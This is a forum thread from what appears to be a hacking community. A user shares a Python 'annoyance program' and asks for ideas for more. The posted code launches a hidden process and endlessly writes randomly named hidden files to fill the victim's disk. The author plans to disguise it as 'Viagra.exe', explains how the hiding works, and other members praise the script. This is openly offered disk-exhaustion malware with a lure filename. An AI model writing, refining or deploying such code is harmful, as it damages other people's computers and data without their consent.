Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Coders Lounge › Program Suggestions

LightbulbProgram Suggestions

Posts 1–10 of 10 · Page 1 of 1
Ffrocks3
Ffrocks3
Program Suggestions
So I made this [In Python] as my first *Annoyance Program*. I wanted to make some more, Any ideas?

This one opens plays elevator music hides itself and then makes hidden files that don't stop growing in the same folder it's in.
(Named Viagra.exe After exported because it grows fast and big)

Code:
# -*- coding: utf-8 -*-
from errno import *
from sys import *
import os
from msvcrt import *
from time import *
from random import *
import subprocess

## Music Time Bby.

##os.system("start ElevatorMusic.mp3")
os.system('start Multitool.exe')

##Hiden
def startProgram( ):
    SW_HIDE = 0
    info = subprocess.STARTUPINFO( )
    info.dwFlags = subprocess.STARTF_USESHOWWINDOW
    info.wShowWindow=SW_HIDE
    subprocess.Popen(r' Multitool.exe', startupinfo=info)
    startProgram

##Write File
name=randint(0,9999999999)
write_str="�"*1024*1024*10
with open(str(name), 'w') as f:
    while True:
        try:
            fn=str(name)
            p=os.popen('attrib +h ' + fn)
            t=p.read()
            p.close()
            f.write(write_str)
            f.flush()
        except IOError as err:
            if err.errno == errno.ENOSPC:
                write_str_len=len(write_str)
                if write_str_len>1:
                    write_str=write_str[:write_str_len/2]
                else:
                    break
            else:
                raise
                raise
#1 · edited 10y ago · 10y ago
Dab1996426
Dab
That's python wtf? Maybe I'm thinking of perl but damn that shit is easy to understand lol. It's just like VB.
#2 · 10y ago
MA
maestro1994
Quote Originally Posted by Dab1996426 View Post
That's python wtf? Maybe I'm thinking of perl but damn that shit is easy to understand lol. It's just like VB.
It's Python.
#3 · 10y ago
Ffrocks3
Ffrocks3
Quote Originally Posted by maestro1994 View Post
It's Python.
Quote Originally Posted by Ffrocks3 View Post
So I made this [In Python]
Yep it is, I didn't Say that!
#4 · 10y ago
MA
maestro1994
Quote Originally Posted by Ffrocks3 View Post
(Named Viagra.exe ...)
? What the @#~# is that name? You know what I mean ... Che roba è?

Anyway I still can't understand so much the sense of the program. Are you a beginner?
#5 · 10y ago
Ffrocks3
Ffrocks3
Quote Originally Posted by maestro1994 View Post
? What the @#~# is that name? You know what I mean ... Che roba è?

Anyway I still can't understand so much the sense of the program. Are you a beginner?
The Name is A Joke and nope but I can explain the Code:

name=randint(0,9999999999) - Naming random files

write_str="�"*1024*1024*10 = Making the file and filling it with some Mb of empty characters.

fn=str(name)
p=os.popen('attrib +h ' + fn)
t=p.read()
p.close()
f.write(write_str)
f.flush()

- Hiding That File So you only can see if you have hidden files on.
#6 · 10y ago
LA
Law
If it's python you could of just used a plug in for write file and edited it.
#7 · 10y ago
-Panda-
-Panda-
Cool program. Better then what I can achieve on python :3
#8 · 10y ago
Ffrocks3
Ffrocks3
Quote Originally Posted by PandaThePro View Post
Cool program. Better then what I can achieve on python :3
Haha Thanks!
#9 · 10y ago
griimnak
griimnak
Haha that name fits the program perfectly. Cool script, +rep
#10 · 10y ago
Posts 1–10 of 10 · Page 1 of 1

Post a Reply

Similar Threads

  • PROGRAM Suggestion * SO COOL!By HustlaOwnz in CrossFire Discussions
    11Last post 16y ago
  • [Suggestion] Programing ClassesBy zorats in Suggestions, Requests & General Help
    3Last post 13y ago
  • [Request/Suggestion] More programming sections.By wr194t in Suggestions, Requests & General Help
    0Last post 18y ago
  • Problem Wit Hacking ProgramsBy f5awp in General Gaming
    5Last post 20y ago
  • Any good game suggestions?By Zededarian in WarRock - International Hacks
    1Last post 20y ago

Tags for this Thread

#cmd#console#disk#drive#error#exec#python